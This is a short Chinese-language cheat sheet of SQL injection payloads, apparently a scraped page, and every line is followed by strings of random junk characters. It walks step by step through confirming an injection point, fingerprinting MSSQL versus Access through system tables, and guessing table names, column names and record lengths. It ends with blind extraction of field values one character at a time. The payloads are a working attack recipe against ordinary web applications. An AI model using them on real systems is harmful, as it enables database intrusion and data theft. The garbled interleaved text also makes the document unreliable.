1.判断是否有注入;and 1=1 ;and 1=2 i'tp1CI
2.初步判断是否是mssql ;and user>0 km\%BD~
=n0*{~r
3.注入参数是字符'and [查询条件] and ''=' xm H-!Da
\G;CQV#{9
4.搜索时没过滤参数的'and [查询条件] and '%25'=' 7g6RiH}
59!)j>f
5.判断数据库系统 fLB1)kTS
77We;a
;and (select count(*) from sysobjects)>0 mssql .3wY\W8Dr-
o3h -=t
;and (select count(*) from msysobjects)>0 access kx{!b3"
q)iTn)Z!
X?dfcS*!n
|}S1o0v{(a
6.猜数据库 ;and (select Count(*) from [数据库名])>0 <qY5SV,
crn k|o
7.猜字段 ;and (select Count(字段名) from 数据库名)>0 CLK^ gZ
[7\>"v6
8.猜字段中记录长度 ;and (select top 1 len(字段名) from 数据库名)>0 e4.&aIC[
}uQ${]&D
9.(1)猜字段的ascii值(access) Do;#NLrWb
yJD>ny
;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0 y1,5$0@G
U e*$&VlT
(2)猜字段的ascii值(mssql) r!K|E95oj9
&!1}`4$[T
;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0 R6@uM<